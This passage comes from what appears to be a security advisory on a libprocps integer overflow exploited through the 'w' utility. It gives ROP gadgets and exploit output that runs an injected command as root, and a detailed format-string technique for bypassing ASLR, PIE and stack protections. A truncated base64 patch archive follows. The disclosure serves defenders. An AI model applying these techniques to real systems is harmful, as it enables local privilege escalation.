the command located at RDI,\r\n \"id>>/tmp/w.$$\"):\r\n\r\n 401100: ff 35 02 2f 20 00 pushq 0x202f02(%rip)\r\n 401106: ff 25 04 2f 20 00 jmpq *0x202f04(%rip)\r\n\r\n- the fourth gadget that we execute, 0x402a50, makes a clean exit:\r\n\r\n 402a50: bf 01 00 00 00 mov $0x1,%edi\r\n 402a55: e8 36 e7 ff ff callq 401190 <_exit@plt>\r\n\r\n$ ./w-exploit-Non-PIE\r\npositive_tot 2147482113\r\ndistance_tot 2147482112\r\ndistance 12024752\r\n...\r\ndistance 12024752\r\noff 279917264\r\nver_beg 2e26ce0 ver_end 5426ce0\r\nrel_beg 15f19fb0 rel_end 18519fb0\r\nstr_beg 2900d280 str_end 2b60d280\r\nsym_beg 3c100570 sym_end 3e700570\r\nreloc_arg 16957128\r\nnentries 5\r\nPOSITIVE_TOT 2147482113\r\nDISTANCE_TO_PT 1\r\nnegwrite_off 2147485183\r\nnentries 1\r\nready\r\n\r\nThen, if an administrator executes w:\r\n\r\n# cat /tmp/w.*\r\ncat: '/tmp/w.*': No such file or directory\r\n\r\n# w\r\n\r\n# cat /tmp/w.*\r\nuid=0(root) gid=0(root) groups=0(root)\r\n\r\n========================================================================\r\n5.5. PIE exploitation\r\n========================================================================\r\n\r\nIn this section, we describe our proof-of-concept exploit against the\r\nPIE \"w\" on Debian 9 and Fedora 27. The first technique that we tried, a\r\npartial overwrite of a function pointer in the PROCTAB structure, does\r\nnot work:\r\n\r\n- we are limited to a 2-byte overwrite, or else we lose the \"one-shot\"\r\n quality of our exploit (we must brute-force the random bits that we\r\n overwrite);\r\n\r\n- the original function pointer refers to a piece of code in libprocps\r\n that offers a very limited choice of gadgets;\r\n\r\n- file2strvec() ends our command-line argument strings (which overwrite\r\n the function pointer) with a null byte, and further reduces the number\r\n of available gadgets.\r\n\r\nOur second, working technique is derived from halfdog's fascinating\r\nhttps://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/ and\r\ntransforms libprocps's integer overflow and memory corruption into a\r\nformat-string exploit:\r\n\r\n- we overwrite the dirname pointer to \"/usr/share/locale\" (a member of\r\n the struct binding malloc()ated at the very beginning of w's heap by\r\n bindtextdomain()) with a pointer to \"/tmp\" -- we do not need to worry\r\n about ASLR, because we arrange for file2strvec() to overwrite dirname\r\n with a pointer to our command-line argument strings; alternatively, we\r\n could overwrite the \"procps-ng\" string (malloc()ated at the beginning\r\n of w's heap by textdomain()), but this would also overwrite the chunk\r\n header of the struct PROCTAB, and would cause a crash in closeproc();\r\n\r\n- we thereby control the translation strings returned by the *gettext()\r\n functions and the _() macro (the overwritten dirname pointer is used\r\n to construct the names of the translation files \".mo\") and therefore\r\n control two format-strings in w's main():\r\n\r\n591 printf(_(\"%-*s TTY \"), userlen, _(\"USER\"));\r\n...\r\n595 printf(_(\" LOGIN@ IDLE JCPU PCPU WHAT\\n\"));\r\n\r\n- we exploit the first format-string to create a pointer to a saved RIP\r\n on the stack, and we write this pointer to the stack itself;\r\n\r\n- we use this pointer, and the second format-string, to overwrite the\r\n saved RIP with the address of a useful libc gadget (we return into\r\n popen() on Debian 9, and wordexp() on Fedora 27).\r\n\r\nHowever, unlike halfdog, we cannot defeat ASLR by simply dumping the\r\ncontents of the stack with a format-string, because we have not access\r\nto the output of \"w\" (it is executed by another user, administrator, or\r\nscript). Instead, we implement Chris Evans's \"read-add-write\" primitive\r\nhttps://scarybeastsecurity.blogspot.com/2016/11/0day-exploit-advancing-exploitation.html\r\n(\"Trick #6: co-opting an addition primitive\") with format-strings only.\r\n\r\nWith the first format-string:\r\n\r\n- we \"read\" the LSW (Least Significant Word, 32 bits) of a stack pointer\r\n that is located on the stack itself and hence accessible through the\r\n format-string arguments -- for example, the argv pointer;\r\n\r\n- we \"add\" a distribution-specific constant to this LSW, to make it\r\n point to a saved RIP on the stack -- for example, the saved RIP pushed\r\n onto the stack by the call to printf_positional() in vfprintf();\r\n\r\n- we \"write\" this modified LSW to the LSW of another stack pointer that\r\n is also located on the stack itself and hence accessible through the\r\n format-string arguments -- for example, the argv[0] pointer.\r\n\r\nWith the second format-string:\r\n\r\n- we \"read\" the LSW of a libc pointer that is located on the stack and\r\n hence accessible through the format-string arguments -- for example,\r\n the pointer to __libc_start_main();\r\n\r\n- we \"add\" a distribution-specific constant to this LSW, to make it\r\n point to a useful libc gadget -- for example, popen() or wordexp();\r\n\r\n- we \"write\" this modified LSW to the LSW of a saved RIP on the stack:\r\n we use the pointer (to the saved RIP) created on the stack by the\r\n first format-string.\r\n\r\nTo implement the \"read-add-write\" primitive:\r\n\r\n- we \"read\" the LSW of a pointer (we load it into vfprintf's internal\r\n character counter) through a variable-width specifier such as \"%*R$x\",\r\n where R is the position (among the format-string arguments on the\r\n stack) of the to-be-read pointer;\r\n\r\n- we \"add\" a constant A to this LSW through a constant-width specifier\r\n such as \"%Ax\";\r\n\r\n- we \"write\" this modified LSW to the LSW of another pointer through a\r\n specifier such as \"%W$n\", where W is the position (among the format-\r\n string arguments on the stack) of a pointer to the to-be-overwritten\r\n pointer (for example, in our first format-string we overwrite the LSW\r\n of the argv[0] pointer through the argv pointer, and in our second\r\n format-string we overwrite the LSW of a saved RIP through the\r\n overwritten argv[0] pointer); in summary:\r\n\r\n . if we want to \"add\" a constant to the LSW that we \"read\", we use a\r\n simple format-string such as \"%*R$x%Ax%W$n\", where A is equal to the\r\n constant that we want to add;\r\n\r\n . if we want to \"subtract\" a constant from the LSW that we \"read\", we\r\n use a format-string such as \"%*R$x%W$n%Ax%W$hn\", where A is equal to\r\n 65536 minus the constant that we want to subtract (the smaller the\r\n constant, the higher the probability of success).\r\n\r\nThis generic technique defeats NX, ASLR, PIE, SSP, and FORTIFY, but it\r\nsuffers from three major drawbacks:\r\n\r\n- it requires two different format-strings, because it must reset\r\n vfprintf's internal character counter between the two \"read-add-write\"\r\n primitives;\r\n\r\n- its probability of success is 1/4 (not a one-shot, but not a\r\n brute-force either), because the probability of success of each\r\n \"read-add-write\" primitive is 1/2 (the randomized LSW that is \"read\"\r\n as an \"int width\" must be positive), and the stack is randomized\r\n independently of the libc;\r\n\r\n- it outputs 2*1GB on average (2*2GB at most): this may be acceptable if\r\n the target utility is executed by a script or daemon, but not if it is\r\n executed manually by an administrator (terminal escape sequences may\r\n be used to overcome this drawback, but we did not explore this\r\n possibility yet).\r\n\r\nIt is also possible to implement distribution-specific variants of this\r\ngeneric technique: for example, we developed a Debian-specific version\r\nof our \"w\" exploit that requires only one format-string, has an 11/12\r\nprobability of success (nearly one-shot), and outputs only a few\r\nkilobytes. This is left as an exercise for the interested reader.\r\n\r\n\r\n========================================================================\r\nAcknowledgments\r\n========================================================================\r\n\r\nWe thank Craig Small and the members of linux-distros@openwall and\r\nsecurity@kernel.\r\n\r\n\r\n========================================================================\r\nPatches.tar.gz.b64\r\n========================================================================\r\n\r\n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\r\nH9B2HI5nqaTMr2QHSymvw8fbgm